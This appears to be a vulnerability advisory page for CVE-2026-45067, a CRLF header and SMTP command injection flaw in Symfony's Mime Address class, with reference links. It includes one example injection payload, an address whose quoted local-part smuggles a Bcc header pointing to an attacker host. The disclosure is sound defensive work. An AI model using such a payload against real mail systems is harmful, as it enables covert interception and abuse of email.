CVE-2026-45067: Symfony has Email Header / SMTP Command Injection via CRLF in Symfony\Component\Mime\Address
Symfony\Component\Mime\Address is the value-object every Symfony Mailer address (to/cc/bcc/from/reply-to) flows through; its constructor is documented as validating the address and throwing on invalid input, so developers treat it as a security boundary.
The constructor accepts email addresses whose local-part (the part before @) is an RFC-5322 quoted string containing raw \r\n bytes, e.g. "x\r\nBcc: attacker@evil"@example.com. The stored address is later emitted verbatim into (1) the rendered message headers and (2) SmtpTransport’s MAIL FROM:<...> / RCPT TO:<...> protocol lines, turning the embedded CRLF into a new mail header and/or a new SMTP command.
References
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/mime/CVE-2026-45067.yaml
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2026-45067.yaml
- github.com/advisories/GHSA-qpmx-3rfj-7rhv
- github.com/symfony/symfony/commit/dc2dbd29211eb4ddc451373fa1374fb926e94604
- github.com/symfony/symfony/security/advisories/GHSA-qpmx-3rfj-7rhv
- nvd.nist.gov/vuln/detail/CVE-2026-45067
- symfony.com/cve-2026-45067
Code Behaviors & Features
Detect and mitigate CVE-2026-45067 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →